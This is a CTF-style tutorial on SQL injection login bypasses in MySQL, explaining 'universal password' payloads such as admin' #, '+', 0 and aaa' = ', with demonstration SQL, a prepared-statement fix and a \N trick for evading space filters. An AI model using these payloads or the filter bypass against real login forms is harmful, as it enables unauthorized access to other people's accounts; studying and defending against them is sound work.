CTF SQL universal password

Time: 2020-10-1

The following are some of my takeaways from learning SQL injection. I hope they can help you. If there are any mistakes, please point them out.

 

Types of universal password (the payload typed into the username and password fields):

① select * from admin where username = '' and password = '' (the shape of the login query being attacked)

② admin' #

③ '+'   '+'

④ 0

⑤ aaa' = '

 

In the following select statement the username and password can be treated as string variables:

select * from user where username = 'admin' and password = 'yi';

What is the judgment logic of the statement?

The row is returned when username = 'admin' and password = 'yi' are both true.

In other words, it does not matter how the two comparisons are made true: as long as both evaluate to true, the query succeeds even when the supplied username and password are wrong. This is the injection principle behind ③ and ④ (and, in a different form, ⑤).

② select * from user where username = 'chen' #' and password = 'qian';

Everything after # is a comment, so only username = 'chen' is evaluated and the password check never runs. The name given before the quote has to be an account that actually exists.

③ select * from user where username = ' '+' ' and password = ' '+' '; (limited)

select ' '+' '; (result is 0)

select 'qian'=0; (result is 1)

select '1qian'=0; (result is 0)

This only works when the stored username and password are strings that do not begin with a digit, e.g. 'q123' but not '1qian'.

MySQL treats + as numeric addition, so ' '+' ' converts both strings to numbers and yields 0; the condition becomes username = 0 and password = 0. When a string is then compared with a number, the string is converted as well: a string that does not begin with a digit becomes 0 (so 'qian' = 0 is true), while '1qian' becomes 1 and the comparison fails. Note that = here is the comparison sign as in mathematics, not assignment.

④ select * from user where username = 0 and password = 0;

The same principle as ③, written differently: the stored username and password are strings, and a string that does not begin with a digit converts to 0 when compared with an integer. The difference is that ③ manufactures the 0 by arithmetic inside the quoted string, whereas ④ only reaches the query like this if the application inserts the input unquoted; if it is quoted, username = '0' is a plain string comparison and fails.

⑤ select * from user where username = 'aaa'='' and password = 'aaa'='';

select 'aaa'='a'; (result is 0)

select 'aaa'='a'=''; (result is 1)

Judgment logic: = is evaluated left to right, so username = 'aaa' = '' means (username = 'aaa') = ''. If the username is not 'aaa' the inner comparison is 0 (false), and 0 = '' is true because the empty string converts to 0. The password side works the same way, so the whole condition holds for every row (provided neither the username nor the password is literally 'aaa').
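Added example, not code from the original post: the payloads above run in one MySQL session against a constructed table. The table name user, its columns and both rows are assumptions made for the demonstration ('admin'/'yi' is the pair used in the text; '1user'/'2pw' is an account whose fields begin with a digit, to show where ③ and ④ stop working). The prepared statement at the end shows that binding the input as data defeats all of them.

```sql
-- Added example, not from the original post. Table, columns and rows are
-- constructed for the demonstration.
CREATE TABLE user (id INT, username VARCHAR(32), password VARCHAR(32));
INSERT INTO user VALUES (1, 'admin', 'yi'), (2, '1user', '2pw');

-- The vulnerable application builds the query by concatenating raw input:
--   SELECT * FROM user WHERE username = '<username>' AND password = '<password>'

-- ② username = admin' #  : everything after # is a comment, so the password
-- check disappears. (The # also swallows this line's terminator, hence the
-- semicolon on its own line.)
SELECT * FROM user WHERE username = 'admin' #' AND password = 'anything'
;
-- returns row 1 (admin)

-- ③ username = password = '+' : ' '+' ' is numeric addition of two strings,
-- which is 0; the column value is then converted to a number for the compare.
SELECT ' '+' ' AS arith;                 -- 0
SELECT 'admin' = 0, '1user' = 0;         -- 1, 0  (a leading digit converts to 1)
SELECT * FROM user WHERE username = ' '+' ' AND password = ' '+' ';
-- returns row 1 only; '1user' = 0 and '2pw' = 0 are both false

-- ④ bare 0: the same comparison, but it only reaches the query like this when
-- the application does NOT quote the input. Quoted, it is a string compare.
SELECT * FROM user WHERE username = 0 AND password = 0;      -- row 1 only
SELECT * FROM user WHERE username = '0' AND password = '0';  -- no rows

-- ⑤ username = password = aaa' = ' : = associates left to right, so the
-- condition is ((username = 'aaa') = '') AND ((password = 'aaa') = '').
SELECT 'aaa' = 'a', ('aaa' = 'a') = '';  -- 0, 1  ('' converts to 0)
SELECT * FROM user WHERE username = 'aaa' = '' AND password = 'aaa' = '';
-- returns both rows; it would miss only an account literally named 'aaa'

-- The fix: bind the input as data. Each payload is now compared as a plain
-- string and never changes the structure of the statement.
PREPARE login FROM 'SELECT * FROM user WHERE username = ? AND password = ?';
SET @u = 'admin'' #', @p = 'anything';
EXECUTE login USING @u, @p;              -- 0 rows
SET @u = '''+''', @p = '''+''';
EXECUTE login USING @u, @p;              -- 0 rows
SET @u = 'aaa'' = ''', @p = 'aaa'' = ''';
EXECUTE login USING @u, @p;              -- 0 rows
DEALLOCATE PREPARE login;
DROP TABLE user;
```

Run it in the mysql client against a scratch database. The row counts in the comments are what MySQL returns for this table; the string-to-number conversions in ③ and ④ also raise "Truncated incorrect DOUBLE value" warnings, which the application will usually never see.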

select \Nfrom user; (executes successfully, with no space between N and from)

select 1from user; (fails: with no space, 1from is read as a single identifier, i.e. an unknown column)

select 1,2,\Nfrom user; (executes successfully, with no space between 2 and from)

\N is MySQL's shorthand for NULL, and the parser ends that token right after the N, so the keyword that follows needs no separating space. When a space cannot be placed to the left of from (for example because a filter strips spaces), consider whether this can be used as a bypass.
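Added example, not from the original post: the \N trick in one MySQL session, with the working and failing forms side by side. The table and its single row are constructed for the demonstration.

```sql
-- Added example, not from the original post. Table and row are constructed.
CREATE TABLE user (id INT, username VARCHAR(32));
INSERT INTO user VALUES (1, 'admin');

-- \N is MySQL's literal spelling of NULL (uppercase N only), and the lexer
-- closes that token right after the N, so the next keyword needs no space.
SELECT \N IS NULL;            -- 1
SELECT \Nfrom user;           -- NULL           : executes, one row
SELECT 1,2,\Nfrom user;       -- 1, 2, NULL     : executes, one row

-- A number followed directly by letters is lexed as ONE identifier, so this
-- fails with "Unknown column '1from' in 'field list'" instead of being read
-- as 1 FROM. (It aborts a non-interactive script run; keep it last.)
SELECT 1from user;

DROP TABLE user;
```

The space after from is still required: \N only removes the need for the space in front of the keyword, which is the position the text is talking about.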